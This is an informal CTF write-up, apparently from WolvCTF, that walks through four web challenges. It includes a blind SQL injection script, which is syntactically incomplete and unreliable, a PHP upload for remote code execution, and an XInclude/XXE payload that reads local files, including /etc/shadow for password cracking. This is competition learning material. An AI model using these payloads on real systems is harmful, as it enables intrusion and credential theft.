WolvCTF and i did my best.

Hello guys, our team got rank 48th when i decide to write this writeup. I had just solved 2 web. Have no time for Other up 2,3,4 challenges btw i will do it later.

Web1: Bean Cafe

We need upload 2 difference images but same the md5 hash
I found this drive which contain 2  image :d thx someone whose i dont know the name lmao
Uploaded it

Web2: Order Up 1 

This is my script. Yeah that's all
import requests
import json
import string

a = string.printable
s = ""
url = "https://dyn-svc-order-up-xec3il0vccu5tn6p0q2n-okntin33tq-ul.a.run.app/query"
for i in range(1,100):
    for j in a:
        data = {
            "order":f" (case when (ascii(substr(current_query(),{i},1))={ord(j)}) then item_name else category end)"
            #(case when (ascii(substr(current_database(),0,1))>0) then item_name else category end)
        if json.loads(r.text)[0]["item_name"] == "BBQ Pulled Pork Sandwich":
            print(f"[{j}]: Not OK")

Web3: Upload fun

Following this link, we saw the code
Well, they didnt check content and extension so we could upload a php file to RCE. Btw, the hard here is $hash, we didnt know what hash is. But to remember, the author dont use @error_reporting(1), so if we could make some error with file, maybe can be lecked.
I uploaded file with long name like that and got it
upload again with short filename and get flag
Web4: Username

Ohh, the hint related to jwt could be cracked.

Btw if you guys intend the source code, maybe xxe vulnerable
Cracked successfuly.
Now just use simple payload xxe to check. My payload is
  "data": "<data><username><xi:include xmlns:xi=\"http://www.w3.org/2001/XInclude\" parse=\"text\" href=\"file:///app/app.py\"/></username></data>"
Hav new secret endpoint, now we need login and get flag. We know username is flaguser but dont know password. You can read /etc/password and /etc/shadow
Cracked md5 hash in /etc/shadow and password was qqz3. Submit and catch

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